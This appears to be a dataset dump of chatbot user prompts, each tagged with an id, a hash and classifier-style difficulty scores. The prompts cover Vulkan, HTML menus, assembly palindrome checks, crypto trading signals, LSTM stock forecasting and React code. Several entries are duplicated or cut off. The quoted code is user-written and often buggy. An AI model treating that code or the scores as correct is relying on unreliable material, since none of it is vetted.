vkFreeCommandBuffers(device, commandPool, 1, &commandBuffer);
}
}
Can you improve the code for the BufferUtils class?
|
775c13317ff1f8b1bc9dc26f299e492c
|
{
"intermediate": 0.4166281521320343,
"beginner": 0.35532474517822266,
"expert": 0.22804704308509827
}
|
11,295
|
ok, look, next problem.
when gpt sends messages to me, message fragments that contain code are formatted in <code> with class="hljs language-undefined" or class="language-css hljs" or whatever.
inside the original message it looks like "`.preformatted`" or like "
|
0fce26472bd8a67056401bb724e03758
|
{
"intermediate": 0.35977235436439514,
"beginner": 0.4644617736339569,
"expert": 0.17576591670513153
}
|
11,296
|
ok, look, next problem.
when gpt sends messages to me, message fragments that contain code are formatted in <code> with class="hljs language-undefined" or class="language-css hljs" or whatever.
inside the original message it looks like "`.preformatted`" or like "
|
bbc6a3d7d8ea19baaaa235ef0edf2ac0
|
{
"intermediate": 0.35977235436439514,
"beginner": 0.4644617736339569,
"expert": 0.17576591670513153
}
|
11,297
|
ok, look, next problem.
when gpt sends messages to me, message fragments that contain code are formatted in <code> with class="hljs language-undefined" or class="language-css hljs" or whatever.
inside the original message it looks like "`.preformatted`" or like "
|
f6d8b7ac34e26c1ea55a70714718b85f
|
{
"intermediate": 0.35977235436439514,
"beginner": 0.4644617736339569,
"expert": 0.17576591670513153
}
|
11,298
|
hi
|
d4d839a9d131fa9176cf8dfe7ec606c8
|
{
"intermediate": 0.3246487081050873,
"beginner": 0.27135494351387024,
"expert": 0.40399640798568726
}
|
11,299
|
I want you to act as a qualified Python programmer an to review the following Python code. Point out potential problems with it and how it can be improved while still working as original one.
|
8436ff1d6140c2eb3876105caf5ac972
|
{
"intermediate": 0.3600691258907318,
"beginner": 0.3406076431274414,
"expert": 0.2993232309818268
}
|
11,300
|
html I have a 5 menu options I want to create a menu where you can scroll through the options with arrow key up and down and it will only show the menu option you have selected the one above and the one below
each menu option will also have a scroll bar that you can drag between 0.00 and 1.00
|
7baf66b9146cce5d1e8760ea79391ed7
|
{
"intermediate": 0.29826462268829346,
"beginner": 0.27027279138565063,
"expert": 0.4314626157283783
}
|
11,301
|
Load two images for blend based on C language and opengles3.2 version
|
f7fd01392c2f4f06353a2bffd4327ea9
|
{
"intermediate": 0.4297705590724945,
"beginner": 0.32181084156036377,
"expert": 0.24841858446598053
}
|
11,302
|
hello
|
ec68c63b9047b1cedde674124193bb88
|
{
"intermediate": 0.32064199447631836,
"beginner": 0.28176039457321167,
"expert": 0.39759764075279236
}
|
11,303
|
for (int i = 0; i< Paintings.Length; i++)
{
float s;
if (Paintings[i].paidBy == IngredientUnit.Vin)
{
s = Paintings[i].price;
Debug.Log(s);
//Debug.Log(900 + 5250);
}
}
|
868e1563bfda0701a4faa1d99e3332b5
|
{
"intermediate": 0.26343944668769836,
"beginner": 0.47979414463043213,
"expert": 0.2567663788795471
}
|
11,304
|
how to force selenium chrome to use specific network interface (lets say wifi) with python on windows?
|
b888cfc5095ca5b00bdf6bd9cd7b4a1b
|
{
"intermediate": 0.35173532366752625,
"beginner": 0.18389247357845306,
"expert": 0.4643721580505371
}
|
11,305
|
correct this code please correct this code such that using same instruction like in code no other instruction but try removing errors from it and adding comments . the program should input size of palindrome between 0 to 9 and then check if its palindrome or not using stack and array for values comparision .model small
.data
m db "enter size of palindrome string 1 to 9 : $"
m1 db 0ah,0dh,"enter string : $"
m2 db 0ah,0dh,"palindrome string : $"
m3 db 0ah,0dh,"not palindrome string : $"
arr db ?
.stack 10h
.code
mov ax,@data
mov ds,ax
lea dx,m
mov ah,09
int 21h
mov ah,01
int 21h
;lea dx,m1
;mov ah,09
;int 21h
mov cl,al
mov bl,al
mov si,0
l1:
mov ah,01
int 21h
push ax
mov [arr+si],al
inc si
loop l1
mov cl,bl
mov si,0
l2:
pop ax
mov bl,[arr+si]
cmp ax,bx
je l2
jne l3
lea dx,m2
mov ah,09
int 21h
jmp ou
l3:
lea dx,m3
mov ah,09
int 21h
ou:
|
4f231100721f70e34ba8dad63f96f50b
|
{
"intermediate": 0.3557490110397339,
"beginner": 0.40510883927345276,
"expert": 0.23914216458797455
}
|
11,306
|
correct this code please correct this code such that using same instruction like in code no other instruction but try removing errors from it and adding comments . the program should input size of palindrome between 0 to 9 and then check if its palindrome or not using stack and array for values comparision .model small
.data
m db "enter size of palindrome string 1 to 9 : $"
m1 db 0ah,0dh,"enter string : $"
m2 db 0ah,0dh,"palindrome string : $"
m3 db 0ah,0dh,"not palindrome string : $"
arr db ?
.stack 10h
.code
mov ax,@data
mov ds,ax
lea dx,m
mov ah,09
int 21h
mov ah,01
int 21h
;lea dx,m1
;mov ah,09
;int 21h
mov cl,al
mov bl,al
mov si,0
l1:
mov ah,01
int 21h
push ax
mov [arr+si],al
inc si
loop l1
mov cl,bl
mov si,0
l2:
pop ax
mov bl,[arr+si]
cmp ax,bx
je l2
jne l3
lea dx,m2
mov ah,09
int 21h
jmp ou
l3:
lea dx,m3
mov ah,09
int 21h
ou:
|
6ec10d6acc3fb025977ce59d80e20dfa
|
{
"intermediate": 0.3557490110397339,
"beginner": 0.40510883927345276,
"expert": 0.23914216458797455
}
|
11,307
|
michael intends to invest 50000 in two different investments: one low risk investment that yyields 5% annually and one high risk investment that yields 14% annually. to earn 5000 in interst annually, how much money should he invest at each rate
|
22d1b29a7ab6ee6985ee550de4daf754
|
{
"intermediate": 0.4341219663619995,
"beginner": 0.24134095013141632,
"expert": 0.3245370388031006
}
|
11,308
|
correct this code please correct this code such that using same instruction like in code no other instruction but try removing errors from it and adding comments . the program should input size of palindrome between 0 to 9 and then check if its palindrome or not using stack and array for values comparision .model small
.data
m db "enter size of palindrome string 1 to 9 : $"
m1 db 0ah,0dh,"enter string : $"
m2 db 0ah,0dh,"palindrome string : $"
m3 db 0ah,0dh,"not palindrome string : $"
arr db ?
.stack 10h
.code
mov ax,@data
mov ds,ax
lea dx,m
mov ah,09
int 21h
mov ah,01
int 21h
;lea dx,m1
;mov ah,09
;int 21h
mov cl,al
mov bl,al
mov si,0
l1:
mov ah,01
int 21h
push ax
mov [arr+si],al
inc si
loop l1
mov cl,bl
mov si,0
l2:
pop ax
mov bl,[arr+si]
cmp ax,bx
je l2
jne l3
lea dx,m2
mov ah,09
int 21h
jmp ou
l3:
lea dx,m3
mov ah,09
int 21h
ou:
|
2086fc6a048e84e083d35282837d01bd
|
{
"intermediate": 0.3557490110397339,
"beginner": 0.40510883927345276,
"expert": 0.23914216458797455
}
|
11,309
|
html I have a 5 menu options I want to create a menu where you can scroll through the options with arrow key up and down and it will only show the menu option you have selected the one above and the one below
each menu option will also have a scroll bar that you can drag between 0.00 and 1.00
|
fb3d1c91ab61db8e64e661151b417a3c
|
{
"intermediate": 0.29826462268829346,
"beginner": 0.27027279138565063,
"expert": 0.4314626157283783
}
|
11,310
|
Write python code to write all prime number between 20 and 200.
|
fbcb6206812431107b29340453240d31
|
{
"intermediate": 0.3494046926498413,
"beginner": 0.24043777585029602,
"expert": 0.41015756130218506
}
|
11,311
|
Write me a Python function to simulate Blackjack
|
413c2ba92b021a470aba27e44d987553
|
{
"intermediate": 0.2478531152009964,
"beginner": 0.3843085467815399,
"expert": 0.3678382933139801
}
|
11,312
|
Write python code to list the 5 largest files on a windows system.
|
1912bd2a2beb74f1cf56188042929d61
|
{
"intermediate": 0.4041188061237335,
"beginner": 0.25970199704170227,
"expert": 0.3361791968345642
}
|
11,313
|
how to find image caption in pdf file with python deep learning
|
a555a47733c2a9c067b3547d1af1ef86
|
{
"intermediate": 0.10804246366024017,
"beginner": 0.08772779256105423,
"expert": 0.8042297959327698
}
|
11,314
|
float FullTotal = 0;
public float totalV;
public float totalS;
public float totalR;
public float totalP;
public float totalA;
float s = 0;
private void Start()
{
// Debug.Log(4500 + 2200 + 2750 + 1600);
PaidAmount(totalV, IngredientUnit.Vin, "Vinoo");
PaidAmount(totalS, IngredientUnit.Sen, "Sen");
PaidAmount(totalR, IngredientUnit.Rue, "Rue");
PaidAmount(totalP, IngredientUnit.Pur, "Pasangi");
PaidAmount(totalA, IngredientUnit.Ama, "Bandi");
FullTotal += s;
Debug.Log("total " + s);
}
public void PaidAmount(float total, IngredientUnit unit, string name)
{
//PAINTING
for (int i = 0; i < Paintings.Length; i++)
{
if (Paintings[i].paidBy == unit)
{
total += Paintings[i].price;
}
}
//FOOD
for (int i = 0; i < Food.Length; i++)
{
if (Food[i].paidBy == unit)
{
total += Food[i].price;
}
}
//DRINKS
for (int i = 0; i < Drinks.Length; i++)
{
if (Drinks[i].paidBy == unit)
{
total += Drinks[i].price;
}
}
//DECO
for (int i = 0; i < Deco.Length; i++)
{
if (Deco[i].paidBy == unit)
{
total += Deco[i].price;
}
}
s = total;
Debug.Log(name + " " + s);
}
|
9e1def3a19ed74e1822ad4f3e7c9f6db
|
{
"intermediate": 0.27275630831718445,
"beginner": 0.5071149468421936,
"expert": 0.22012880444526672
}
|
11,315
|
I used this signal generator code : def get_klines(symbol, interval, lookback):
url = "https://fapi.binance.com/fapi/v1/klines"
end_time = int(time.time() * 1000) # end time is now
start_time = end_time - (lookback * 60 * 1000) # start time is lookback minutes ago
symbol = symbol.replace("/", "") # remove slash from symbol
query_params = f"?symbol={symbol}&interval={interval}&startTime={start_time}&endTime={end_time}"
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'
}
response = requests.get(url + query_params, headers=headers)
response.raise_for_status()
data = response.json()
if not data: # if data is empty, return None
print('No data found for the given timeframe and symbol')
return None
ohlc = []
for d in data:
timestamp = dt.datetime.fromtimestamp(d[0]/1000).strftime('%Y-%m-%d %H:%M:%S')
ohlc.append({
'Open time': timestamp,
'Open': float(d[1]),
'High': float(d[2]),
'Low': float(d[3]),
'Close': float(d[4]),
'Volume': float(d[5])
})
df = pd.DataFrame(ohlc)
df.set_index('Open time', inplace=True)
return df
df = get_klines(symbol, '5m', 44640)
def signal_generator(df):
open = df.Open.iloc[-1]
close = df.Close.iloc[-1]
previous_open = df.Open.iloc[-2]
previous_close = df.Close.iloc[-2]
# Bearish pattern
if (open>close and
previous_open<previous_close and
close<previous_open and
open>=previous_close):
return 'sell'
# Bullish pattern
elif (open<close and
previous_open>previous_close and
close>previous_open and
open<=previous_close):
return 'buy'
# No clear pattern
else:
return ""
df = get_klines(symbol, '5m', 44640), but it giveing me wrong signals. Where I need to buy it returns sell and where sell returns buy
|
32f81f42f33d6d723092ff1402abe605
|
{
"intermediate": 0.46652740240097046,
"beginner": 0.3870702385902405,
"expert": 0.14640232920646667
}
|
11,316
|
Can you show me a c++ class of a base class for draggablewindows for UE5.2? I want a base class that will allow all windows be able to be draggable from the top using an overlay of the sorts in the blue print.
|
93401968ebf9761be1a7c5e51d5fd068
|
{
"intermediate": 0.3321046233177185,
"beginner": 0.3648717701435089,
"expert": 0.30302363634109497
}
|
11,317
|
i am running into an issue in my c++ opengl app. i have a vector which is supposed to store information about animation timestamps (just a regular vector), and i know that its being populated properly, but when i run a different function which gets those values, it says that my vectors have no elements and my program crashes. what could be the problem here? pointer issues?
|
d65b1417faa8bc7529156ec5305e78ee
|
{
"intermediate": 0.7258342504501343,
"beginner": 0.14263227581977844,
"expert": 0.13153356313705444
}
|
11,318
|
name of array in react what kin of letter do I use, big or small?
|
163b29bbfe214c81763b28f46d1b9b58
|
{
"intermediate": 0.5308249592781067,
"beginner": 0.23050019145011902,
"expert": 0.2386748492717743
}
|
11,319
|
that did not work, one person got way more money than they should have
|
7020703f74bbab09226347c8ff25e39e
|
{
"intermediate": 0.30691927671432495,
"beginner": 0.36418890953063965,
"expert": 0.3288917541503906
}
|
11,320
|
Explain parametric polymirphism
|
9ae717c8d97e80cbbc130ee87d5371cc
|
{
"intermediate": 0.25558578968048096,
"beginner": 0.2058563083410263,
"expert": 0.5385578870773315
}
|
11,321
|
I used your code of signal generator : df = get_klines(symbol, '1m', 44640)
def signal_generator(df):
# Calculate moving averages
df['MA_50'] = df['Close'].rolling(window=50).mean()
df['MA_200'] = df['Close'].rolling(window=200).mean()
# Determine trend direction based on moving averages
if df['MA_50'][-1] > df['MA_200'][-1]:
trend = 'bullish'
else:
trend = 'bearish'
# Check for buy/sell signals
if trend == 'bullish' and df['Close'][-1] > df['MA_50'][-1] and df['Close'][-1] > df['MA_200'][-1]:
return 'buy'
elif trend == 'bearish' and df['Close'][-1] < df['MA_50'][-1] and df['Close'][-1] < df['MA_200'][-1]:
return 'sell'
else:
return ''
df = get_klines(symbol, '1m', 44640)
, But it doesn't give me any signal
|
459d9d30e6db93a0d4e7ce44629023d2
|
{
"intermediate": 0.3426012694835663,
"beginner": 0.41255810856819153,
"expert": 0.2448405921459198
}
|
11,322
|
import { OverridableComponent } from "@mui/material/OverridableComponent";
const SidebarListProps = {
title: string,
icon: OverridableComponent<SvgIconTypeMap<{}, "svg">>,
styler: string,
styleIcon: string,
};
const SidebarList: React.FC<SidebarListProps> = ({
title,
icon: Icon,
styler,
styleIcon,
}) => {
return (
<ul className="sidebarContainer__list">
<li className={styler}>
<Icon className={styleIcon} />
{title}
</li>
</ul>
);
};
export default SidebarList;
correct this so it will be comaptible with typescript
|
7b3928f2e811dae52d55e709bf125667
|
{
"intermediate": 0.35611432790756226,
"beginner": 0.40376967191696167,
"expert": 0.24011598527431488
}
|
11,323
|
how can i overlay the miniplayer from the same package in flutter when calling shomModalBottomSheet()
|
69b6303c25342472713075996d2d5588
|
{
"intermediate": 0.5371982455253601,
"beginner": 0.20796774327754974,
"expert": 0.25483402609825134
}
|
11,324
|
Imagine we use c++ class X that inherits virtually from class A and class B. Both A and B define function void doSomething() with some implementation like printing A or B to cout. What will happen if we call function doSomething from object of class X?
|
e9c20fb143c418ce23c2018cef91cca4
|
{
"intermediate": 0.194004088640213,
"beginner": 0.7364621162414551,
"expert": 0.0695338249206543
}
|
11,325
|
Provide an example of downcasting a reference in C++
|
42407a9500053039e02d30fbee8ad59c
|
{
"intermediate": 0.2798631489276886,
"beginner": 0.3230104446411133,
"expert": 0.3971264362335205
}
|
11,326
|
write kotlin code to make a comment system using expandable list view in android.
|
be0b5c0f0ea43c82e04c3e981a3d863c
|
{
"intermediate": 0.49840807914733887,
"beginner": 0.16989004611968994,
"expert": 0.3317018449306488
}
|
11,327
|
使用pandahouse,将dataframe中的数据,以500条为一批生成一条insert语句,保存到以下数据库表
CREATE TABLE ind_cent_drive
(
ts_code String,
trade_date DateTime,
day_idx UInt32,
avgUnitUpVols Float64,
avgUnitUpNormalVols Float64,
avgUnitUpUpperVols Float64,
avgUnitUpLowerVols Float64,
avgUnitDownVols Float64,
avgUnitDownNormalVols Float64,
avgUnitDownUpperVols Float64,
avgUnitDownLowerVols Float64,
avgGapHighVols Float64,
avgGapHighNormalVols Float64,
avgGapHighUpperVols Float64,
avgGapHighLowerVols Float64,
avgGapLowVols Float64,
avgGapLowNormalVols Float64,
avgGapLowUpperVols Float64,
avgGapLowLowerVols Float64,
avgGapVols Float64,
avgGapNormalVols Float64,
avgGapUpperVols Float64,
avgGapLowerVols Float64
)
|
60363e427c19b833d3695a09677ab026
|
{
"intermediate": 0.34044843912124634,
"beginner": 0.29783105850219727,
"expert": 0.3617205023765564
}
|
11,328
|
What is a unit that unit testing refers to
|
14e4a8679dd096dec91b3f66ae4dd570
|
{
"intermediate": 0.24822452664375305,
"beginner": 0.33283528685569763,
"expert": 0.41894015669822693
}
|
11,329
|
hi
|
c5dcb7b828b409401dd50d8af1271cff
|
{
"intermediate": 0.3246487081050873,
"beginner": 0.27135494351387024,
"expert": 0.40399640798568726
}
|
11,330
|
For this code im getting this values is the model good or bad:
Train Score: 86.98 RMSE
Test Score: 178.95 RMSE
Code:
import yfinance as yf
import pandas as pd
import numpy as np
from sklearn.preprocessing import MinMaxScaler
from keras.models import Sequential
from keras.layers import Dense, LSTM
from keras.callbacks import LambdaCallback
nifty = yf.download('^NSEI', start='2009-01-01', end='2021-01-01')
def supertrend(df, period=10, multiplier=3):
hl = (df['High'] + df['Low']) / 2
atr = df['High'].rolling(period).max() - df['Low'].rolling(period).min()
up = hl - multiplier * atr
dn = hl + multiplier * atr
df['ST'] = 0
df['ST'][0] = (df['High'][0] + df['Low'][0]) / 2
position = 'none'
for i in range(1, len(df)):
if df['Close'][i] > up[i]:
if position != 'buy':
position = 'buy'
df['ST'][i] = dn[i]
else:
df['ST'][i] = max(df['ST'][i - 1], dn[i])
elif df['Close'][i] < dn[i]:
if position != 'sell':
position = 'sell'
df['ST'][i] = up[i]
else:
df['ST'][i] = min(df['ST'][i - 1], up[i])
else:
df['ST'][i] = df['ST'][i - 1]
return df
nifty = supertrend(nifty)
nifty.head()
dataset = nifty['Close'].values
dataset = dataset.astype('float32')
dataset = dataset.reshape(-1, 1)
scaler = MinMaxScaler(feature_range=(0, 1))
dataset = scaler.fit_transform(dataset)
def create_dataset(dataset, look_back=1):
dataX, dataY = [], []
for i in range(len(dataset)-look_back-1):
a = dataset[i:(i+look_back), 0]
dataX.append(a)
dataY.append(dataset[i + look_back, 0])
return np.array(dataX), np.array(dataY)
train_size = int(len(dataset) * 0.8)
test_size = len(dataset) - train_size
train, test = dataset[:train_size], dataset[train_size:]
look_back = 1
trainX, trainY = create_dataset(train, look_back)
testX, testY = create_dataset(test, look_back)
trainX = np.reshape(trainX, (trainX.shape[0], 1, trainX.shape[1]))
testX = np.reshape(testX, (testX.shape[0], 1, testX.shape[1]))
model = Sequential()
model.add(LSTM(100, input_shape=(1, look_back)))
model.add(Dense(1))
model.compile(loss='mean_squared_error', optimizer='adam')
model.fit(trainX, trainY, epochs=200, batch_size=1, verbose=0)
trainPredict = model.predict(trainX)
testPredict = model.predict(testX)
trainPredict = scaler.inverse_transform(trainPredict)
trainY = scaler.inverse_transform([trainY])
testPredict = scaler.inverse_transform(testPredict)
testY = scaler.inverse_transform([testY])
import matplotlib.pyplot as plt
trainPredictPlot = np.empty_like(dataset)
trainPredictPlot[:, :] = np.nan
trainPredictPlot[look_back:len(trainPredict)+look_back, :] = trainPredict
testPredictPlot = np.empty_like(dataset)
testPredictPlot[:, :] = np.nan
testPredictPlot[len(trainPredict)+(look_back*2)+1:len(dataset)-1, :] = testPredict
plt.plot(scaler.inverse_transform(dataset), label='Actual')
plt.plot(trainPredictPlot, label='Train Prediction')
plt.plot(testPredictPlot, label='Test Prediction')
plt.legend()
plt.show()
model.save('my_model.h5')
from sklearn.metrics import mean_squared_error
import math
trainScore = math.sqrt(mean_squared_error(trainY[0], trainPredict[:,0]))
print('Train Score: %.2f RMSE' % (trainScore))
testScore = math.sqrt(mean_squared_error(testY[0], testPredict[:,0]))
print('Test Score: %.2f RMSE' % (testScore))
|
79b2fa31c61b0735c77214e7917f086a
|
{
"intermediate": 0.38612034916877747,
"beginner": 0.37679043412208557,
"expert": 0.237089142203331
}
|
11,331
|
So if `(YYYYX)` format it should be `(YYYY)` remove the X write the regex for this in js
|
8c878568ab25dce7f7471ab41bee7b0c
|
{
"intermediate": 0.32694780826568604,
"beginner": 0.48824334144592285,
"expert": 0.1848088502883911
}
|
11,332
|
In this below code for stock market prediction implement the following:
1. Increasing the size of training data: More data can help the model to better understand the underlying patterns, leading to better generalization on unseen test data.
2. Regularization: You can add some regularization techniques like L1 or L2 regularization to prevent overfitting by constraining the model’s weights.
3. Simplifying the model: Reduce the complexity of the model by using fewer or smaller layers, which can prevent it from learning noise and enhance its capacity to generalize.
4. Cross-validation: Perform k-fold cross-validation to get a better estimate of the model’s performance on unseen data. This can provide more insights about the model’s generalization ability.
Code:
import yfinance as yf
import pandas as pd
import numpy as np
from sklearn.preprocessing import MinMaxScaler
from keras.models import Sequential
from keras.layers import Dense, LSTM
from keras.callbacks import LambdaCallback
nifty = yf.download('^NSEI', start='2009-01-01', end='2021-01-01')
def supertrend(df, period=10, multiplier=3):
hl = (df['High'] + df['Low']) / 2
atr = df['High'].rolling(period).max() - df['Low'].rolling(period).min()
up = hl - multiplier * atr
dn = hl + multiplier * atr
df['ST'] = 0
df['ST'][0] = (df['High'][0] + df['Low'][0]) / 2
position = 'none'
for i in range(1, len(df)):
if df['Close'][i] > up[i]:
if position != 'buy':
position = 'buy'
df['ST'][i] = dn[i]
else:
df['ST'][i] = max(df['ST'][i - 1], dn[i])
elif df['Close'][i] < dn[i]:
if position != 'sell':
position = 'sell'
df['ST'][i] = up[i]
else:
df['ST'][i] = min(df['ST'][i - 1], up[i])
else:
df['ST'][i] = df['ST'][i - 1]
return df
nifty = supertrend(nifty)
nifty.head()
dataset = nifty['Close'].values
dataset = dataset.astype('float32')
dataset = dataset.reshape(-1, 1)
scaler = MinMaxScaler(feature_range=(0, 1))
dataset = scaler.fit_transform(dataset)
def create_dataset(dataset, look_back=1):
dataX, dataY = [], []
for i in range(len(dataset)-look_back-1):
a = dataset[i:(i+look_back), 0]
dataX.append(a)
dataY.append(dataset[i + look_back, 0])
return np.array(dataX), np.array(dataY)
train_size = int(len(dataset) * 0.8)
test_size = len(dataset) - train_size
train, test = dataset[:train_size], dataset[train_size:]
look_back = 1
trainX, trainY = create_dataset(train, look_back)
testX, testY = create_dataset(test, look_back)
trainX = np.reshape(trainX, (trainX.shape[0], 1, trainX.shape[1]))
testX = np.reshape(testX, (testX.shape[0], 1, testX.shape[1]))
model = Sequential()
model.add(LSTM(100, input_shape=(1, look_back)))
model.add(Dense(1))
model.compile(loss='mean_squared_error', optimizer='adam')
model.fit(trainX, trainY, epochs=200, batch_size=1, verbose=0)
trainPredict = model.predict(trainX)
testPredict = model.predict(testX)
trainPredict = scaler.inverse_transform(trainPredict)
trainY = scaler.inverse_transform([trainY])
testPredict = scaler.inverse_transform(testPredict)
testY = scaler.inverse_transform([testY])
import matplotlib.pyplot as plt
trainPredictPlot = np.empty_like(dataset)
trainPredictPlot[:, :] = np.nan
trainPredictPlot[look_back:len(trainPredict)+look_back, :] = trainPredict
testPredictPlot = np.empty_like(dataset)
testPredictPlot[:, :] = np.nan
testPredictPlot[len(trainPredict)+(look_back*2)+1:len(dataset)-1, :] = testPredict
plt.plot(scaler.inverse_transform(dataset), label='Actual')
plt.plot(trainPredictPlot, label='Train Prediction')
plt.plot(testPredictPlot, label='Test Prediction')
plt.legend()
plt.show()
model.save('my_model.h5')
from sklearn.metrics import mean_squared_error
import math
trainScore = math.sqrt(mean_squared_error(trainY[0], trainPredict[:,0]))
print('Train Score: %.2f RMSE' % (trainScore))
testScore = math.sqrt(mean_squared_error(testY[0], testPredict[:,0]))
print('Test Score: %.2f RMSE' % (testScore))
# 1. Take the last look_back days (last day in this case) of the dataset
last_day = dataset[-look_back:]
# 2. Scale the input using the fitted MinMaxScaler
last_day_scaled = scaler.transform(last_day)
# 3. Reshape the input to match the required model input shape
last_day_scaled_reshaped = np.reshape(last_day_scaled, (1, 1, look_back))
# 4. Use model.predict() to predict the scaled value for ‘2021-01-02’
next_day_scaled_prediction = model.predict(last_day_scaled_reshaped)
# 5. Inverse-transform the predicted scaled value to the original range using the MinMaxScaler
next_day_prediction = scaler.inverse_transform(next_day_scaled_prediction)
# 6. Print or use the predicted value
print("Prediction for 2021-01-02: ", next_day_prediction[0][0])
|
c602cffd1c9d3062933fcdf9eac7cfcd
|
{
"intermediate": 0.36974531412124634,
"beginner": 0.31075146794319153,
"expert": 0.3195032775402069
}
|
11,333
|
Make a plot for acutal vs predicted :
import yfinance as yf
import pandas as pd
import numpy as np
from sklearn.preprocessing import MinMaxScaler
from keras.models import Sequential
from keras.layers import Dense, LSTM
from keras.callbacks import LambdaCallback
from keras.regularizers import L1L2
from sklearn.model_selection import TimeSeriesSplit
nifty = yf.download('^NSEI', start='2009-01-01', end='2021-01-01')
def supertrend(df, period=10, multiplier=3):
hl = (df['High'] + df['Low']) / 2
atr = df['High'].rolling(period).max() - df['Low'].rolling(period).min()
up = hl - multiplier * atr
dn = hl + multiplier * atr
df['ST'] = 0
df['ST'][0] = (df['High'][0] + df['Low'][0]) / 2
position = 'none'
for i in range(1, len(df)):
if df['Close'][i] > up[i]:
if position != 'buy':
position = 'buy'
df['ST'][i] = dn[i]
else:
df['ST'][i] = max(df['ST'][i - 1], dn[i])
elif df['Close'][i] < dn[i]:
if position != 'sell':
position = 'sell'
df['ST'][i] = up[i]
else:
df['ST'][i] = min(df['ST'][i - 1], up[i])
else:
df['ST'][i] = df['ST'][i - 1]
return df
nifty = supertrend(nifty)
nifty.head()
dataset = nifty['Close'].values
dataset = dataset.astype('float32')
dataset = dataset.reshape(-1, 1)
scaler = MinMaxScaler(feature_range=(0, 1))
dataset = scaler.fit_transform(dataset)
def create_dataset(dataset, look_back=1):
dataX, dataY = [], []
for i in range(len(dataset)-look_back-1):
a = dataset[i:(i+look_back), 0]
dataX.append(a)
dataY.append(dataset[i + look_back, 0])
return np.array(dataX), np.array(dataY)
look_back = 1
X, y = create_dataset(dataset, look_back)
X = np.reshape(X, (X.shape[0], 1, X.shape[1]))
# 1. Increasing the size of training data
train_size = int(len(X) * 0.9)
test_size = len(X) - train_size
X_train, X_test = X[:train_size], X[train_size:]
y_train, y_test = y[:train_size], y[train_size:]
# 4. Cross-validation
tscv = TimeSeriesSplit(n_splits=5)
for train_index, test_index in tscv.split(X_train):
X_train_cv, X_valid_cv = X_train[train_index], X_train[test_index]
y_train_cv, y_valid_cv = y_train[train_index], y_train[test_index]
# 3. Simplifying the model -reduce layers or use smaller layers
model = Sequential()
model.add(LSTM(50, input_shape=(1, look_back), kernel_regularizer=L1L2(l1=0.0, l2=0.1)))
model.add(Dense(1))
# 2. Regularization
model.compile(loss='mean_squared_error', optimizer='adam')
model.fit(X_train_cv, y_train_cv, epochs=5, batch_size=1, verbose=0, validation_data=(X_valid_cv, y_valid_cv))
trainPredict = model.predict(X_train)
testPredict = model.predict(X_test)
trainPredict = scaler.inverse_transform(trainPredict)
y_train = scaler.inverse_transform([y_train])
testPredict = scaler.inverse_transform(testPredict)
y_test = scaler.inverse_transform([y_test])
|
59365c5050bfc914456d07a52ccbd6f0
|
{
"intermediate": 0.40095052123069763,
"beginner": 0.293554425239563,
"expert": 0.3054950535297394
}
|
11,334
|
const Sidebar = () => {
return (
<div className="sidebar">
<div className="sidebarContainer">
<div className="sidebarContainer__menu">
<h3 className="sidebarContainer__title">Dashboard</h3>
<ul className="sidebarContainer__list">
<li className="sidebarContainer__listItem active">
<LineStyle className="sidebarContainer__listIcon" />
Home
</li>
<li className="sidebarContainer__listItem">
<Timeline className="sidebarContainer__listIcon" />
Analytics
</li>
<li className="sidebarContainer__listItem">
<TrendingUp className="sidebarContainer__listIcon" />
Sales
</li>
</ul>
</div>
<div className="sidebarContainer__menu">
<h3 className="sidebarContainer__title">Quick Menu</h3>
<ul className="sidebarContainer__list">
<li className="sidebarContainer__listItem">
<PersonOutline className="sidebarContainer__listIcon" />
Users
</li>
<li className="sidebarContainer__listItem">
<Inventory className="sidebarContainer__listIcon" />
Products
</li>
<li className="sidebarContainer__listItem">
<Paid className="sidebarContainer__listIcon" />
Transactions
</li>
<li className="sidebarContainer__listItem">
<Assessment className="sidebarContainer__listIcon" />
Report
</li>
</ul>
</div>
<div className="sidebarContainer__menu">
<h3 className="sidebarContainer__title">Notifications</h3>
<ul className="sidebarContainer__list">
<li className="sidebarContainer__listItem">
<MailOutline className="sidebarContainer__listIcon" />
Mail
</li>
<li className="sidebarContainer__listItem">
<Forum className="sidebarContainer__listIcon" />
Feedback
</li>
<li className="sidebarContainer__listItem">
<Message className="sidebarContainer__listIcon" />
Message
</li>
</ul>
</div>
<div className="sidebarContainer__menu">
<h3 className="sidebarContainer__title">Staff</h3>
<ul className="sidebarContainer__list">
<li className="sidebarContainer__listItem">
<Work className="sidebarContainer__listIcon" />
Manage
</li>
<li className="sidebarContainer__listItem">
<Timeline className="sidebarContainer__listIcon" />
Analytics
</li>
<li className="sidebarContainer__listItem">
<ReportGmailerrorred className="sidebarContainer__listIcon" />
Report
</li>
</ul>
</div>
</div>
</div>
);
};
refaktor this
|
5f73fdc2508e8028e22c0da15f6acbcc
|
{
"intermediate": 0.35835638642311096,
"beginner": 0.39915207028388977,
"expert": 0.24249158799648285
}
|
11,335
|
Please correct this code from this part:
from sklearn.metrics import mean_squared_error
import math
trainScore = math.sqrt(mean_squared_error(trainY[0], trainPredict[:,0]))
print('Train Score: %.2f RMSE' % (trainScore))
testScore = math.sqrt(mean_squared_error(testY[0], testPredict[:,0]))
print('Test Score: %.2f RMSE' % (testScore))
Code:
import yfinance as yf
import pandas as pd
import numpy as np
from sklearn.preprocessing import MinMaxScaler
from keras.models import Sequential
from keras.layers import Dense, LSTM
from keras.callbacks import LambdaCallback
from keras.regularizers import L1L2
from sklearn.model_selection import TimeSeriesSplit
nifty = yf.download('^NSEI', start='2009-01-01', end='2021-01-01')
def supertrend(df, period=10, multiplier=3):
hl = (df['High'] + df['Low']) / 2
atr = df['High'].rolling(period).max() - df['Low'].rolling(period).min()
up = hl - multiplier * atr
dn = hl + multiplier * atr
df['ST'] = 0
df['ST'][0] = (df['High'][0] + df['Low'][0]) / 2
position = 'none'
for i in range(1, len(df)):
if df['Close'][i] > up[i]:
if position != 'buy':
position = 'buy'
df['ST'][i] = dn[i]
else:
df['ST'][i] = max(df['ST'][i - 1], dn[i])
elif df['Close'][i] < dn[i]:
if position != 'sell':
position = 'sell'
df['ST'][i] = up[i]
else:
df['ST'][i] = min(df['ST'][i - 1], up[i])
else:
df['ST'][i] = df['ST'][i - 1]
return df
nifty = supertrend(nifty)
nifty.head()
dataset = nifty['Close'].values
dataset = dataset.astype('float32')
dataset = dataset.reshape(-1, 1)
scaler = MinMaxScaler(feature_range=(0, 1))
dataset = scaler.fit_transform(dataset)
def create_dataset(dataset, look_back=1):
